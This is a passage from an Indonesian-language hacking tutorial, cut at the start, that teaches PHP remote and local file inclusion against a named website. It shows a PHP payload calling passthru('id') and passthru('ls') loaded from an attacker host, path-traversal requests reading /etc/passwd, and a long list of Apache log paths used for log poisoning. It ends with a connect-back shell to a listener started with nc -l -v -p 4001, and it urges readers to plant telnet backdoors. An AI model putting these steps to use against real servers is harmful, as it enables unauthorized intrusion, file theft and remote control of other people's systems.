”; echo “”.passthru(‘id’).”"; echo “
”; echo “”.passthru(‘ls’).”"; echo “
”; ?>
Jadi kalau diinginkan perintah yang lebih jauh lagi, bisa di ganti sendiri perintah2 didalam file kode.txt tadi, misalkan memasukkan file backdoor telnet atau yang lainnya. (Kreativitas anda ditentukan disini). nah tehnik penyerangan diatas berhasil jikalau tidak ada muncul peringatan seperti berikut:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/htdocs/page.php on line 3 Warning: include(http://site.attacker/kode.txt) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/htdocs/page.php on line 3
Kalau nongol peringatan diatas berarti RFI tidak dibenarkan, mungkin settingan php.ini dibagian allow_url_include berada dalam kondisi Off.
Tapi kita jangan putus asa dulu, sekarang kita coba tehnik LFI atau local file inclusion, dimana file yang akan kita sisipkan dalam hal ini berada disatu tempat bersama server yang akan kita kerjain. Contoh perintahnya: http://ekowahyono.web.id/page.php?page=../../../etc/passwd Dan jika berhasil, maka akan kelihatan isi file /etc/passwd di server yang kita kerjain tadi. mau yang lebih keren lagi? misalnya mendapatkan akses ke shellnya? Coba langkah berikut: 1. Siapkan 1bh login shell ssh atau apa saja yang penting bisa untuk menjalankan program netcat atau nc. 2. Koneksi internet yg ok yah, ngga lelet maksudnya. 3. kreativitas, kesabaran anda, rokok jgn lupa yah. Perhatikan kode yang akan kita masukkan ke server GET/ Dimana ip 202.160.160.160 adalah ip shell kita yang telah kita siapkan untuk menerima koneksi dari server yang sedang kita kerjain tadi. dimana di shell kita jalankan perintah netcat berikut: root@ekowahyono.web.id:~# nc -l -v -p 4001 Perlu diingat, dimana disini diperlukan sedikit kesabaran dan kerja keras, kode yang telah kita coba jalankan diweb yang kita serang, akan menghasilkan error.log yang disimpan dlm sebuah file, dalam hal ini posisi filenya mungkin berbeda disetiap server. berikut kira2 lokasi file error.log nya:
../apache/logs/error.log ../apache/logs/access.log ../../apache/logs/error.log ../../apache/logs/access.log ../../../apache/logs/error.log ../../../apache/logs/access.log ../../../../../../../etc/httpd/logs/acces_log ../../../../../../../etc/httpd/logs/acces.log ../../../../../../../etc/httpd/logs/error_log ../../../../../../../etc/httpd/logs/error.log ../../../../../../../var/www/logs/access_log ../../../../../../../var/www/logs/access.log ../../../../../../../usr/local/apache/logs/access_ log ../../../../../../../usr/local/apache/logs/access. log ../../../../../../../var/log/apache/access_log ../../../../../../../var/log/apache2/access_log ../../../../../../../var/log/apache/access.log ../../../../../../../var/log/apache2/access.log ../../../../../../../var/log/access_log ../../../../../../../var/log/access.log ../../../../../../../var/www/logs/error_log ../../../../../../../var/www/logs/error.log ../../../../../../../usr/local/apache/logs/error_l og ../../../../../../../usr/local/apache/logs/error.l og ../../../../../../../var/log/apache/error_log ../../../../../../../var/log/apache2/error_log ../../../../../../../var/log/apache/error.log ../../../../../../../var/log/apache2/error.log ../../../../../../../var/log/error_log ../../../../../../../var/log/error.log ../../../../../../../var/log/httpd/error_log ../../../../../../../var/log/httpd/error.log Atau mungkin berada disatu direktori bersama: ../../../../../../../var/log/httpd/namadomain.org-error_log ../../../../../../../var/log/httpd/namadomain.org-access_log ../../../../../../../home/namauser/public_html/error_log.gz Sesudah memasukkan kode ‘GET/’
tadi ke web yang sedang kita kerjain, dan kira2 filelognya di ‘../../../../../../../home/namauser/public_html/error_log.gz’, perintah selanjutnya yaitu: http://ekowahyono.web.id/page.php?page=../../../../../../../home/namauser/public_html/error_log.gz Jika berhasil anda telah melakukan Remote Connect-Back Shell,
coba lihat konsole anda yang menjalankan nc tadi, kita akan mendapatkan shell dari target dan kita bisa menjalankan berbagai perintah linux.